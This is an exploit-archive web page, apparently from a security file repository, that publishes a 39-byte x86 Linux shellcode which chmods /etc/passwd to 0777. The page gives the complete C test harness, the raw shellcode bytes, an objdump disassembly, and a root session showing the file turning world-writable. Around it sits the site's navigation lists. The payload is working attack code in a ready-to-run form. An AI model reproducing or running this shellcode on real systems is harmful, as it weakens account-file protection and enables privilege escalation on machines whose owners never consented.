chmod 0777 /etc/passwd sys_chmod syscall Shellcode

chmod 0777 /etc/passwd sys_chmod syscall Shellcode: Posted Jun 2, 2010; Authored by gunslinger | Site gunslingerc0de.wordpress.com; 39 bytes small change mode 0777 of /etc/passwd with sys_chmod syscall shellcode.; tags | shellcode; SHA-256 | 9e17c19986ac6b114d360933a5ac589fab1289914a15dfca985b3c3ded8fdff2; Download | Favorite | View

chmod 0777 /etc/passwd sys_chmod syscall Shellcode

/*
Title  : change mode 0777 of "/etc/passwd" with sys_chmod syscall
Name   : 39 bytes sys_chmod("/etc/passwd",599) x86 linux shellcode
Date   : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

/*
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# gcc -o chmod chmod.c
chmod.c: In function ‘main’:
chmod.c:37: warning: incompatible implicit declaration of built-in function ‘strlen’
root@localhost:/home/gunslinger/shellcode# ./chmod
Length: 39
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# chmod 644 /etc/passwd
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# objdump -d chmod

chmod:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:  eb 15                  jmp    0x8048077
 8048062:  31 c0                  xor    %eax,%eax
 8048064:  b0 0f                  mov    $0xf,%al
 8048066:  5b                     pop    %ebx
 8048067:  31 c9                  xor    %ecx,%ecx
 8048069:  66 b9 ff 01            mov    $0x1ff,%cx
 804806d:  cd 80                  int    $0x80
 804806f:  31 c0                  xor    %eax,%eax
 8048071:  b0 01                  mov    $0x1,%al
 8048073:  31 db                  xor    %ebx,%ebx
 8048075:  cd 80                  int    $0x80
 8048077:  e8 e6 ff ff ff         call   0x8048062
 804807c:  2f                     das    
 804807d:  65                     gs
 804807e:  74 63                  je     0x80480e3
 8048080:  2f                     das    
 8048081:  70 61                  jo     0x80480e4
 8048083:  73 73                  jae    0x80480f8
 8048085:  77 64                  ja     0x80480eb
root@localhost:/home/gunslinger/shellcode#
*/

#include <stdio.h>

char sc[] = "\xeb\x15\x31\xc0\xb0\x0f\x5b\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

int main(void)
{
         fprintf(stdout,"Length: %d\n",strlen(sc));
  (*(void(*)()) sc)();
     
return 0;
}

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 65 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 7 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,819)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,239)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,968)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

chmod 0777 /etc/passwd sys_chmod syscall Shellcode

chmod 0777 /etc/passwd sys_chmod syscall Shellcode

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

chmod 0777 /etc/passwd sys_chmod syscall Shellcode

Share This

chmod 0777 /etc/passwd sys_chmod syscall Shellcode

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems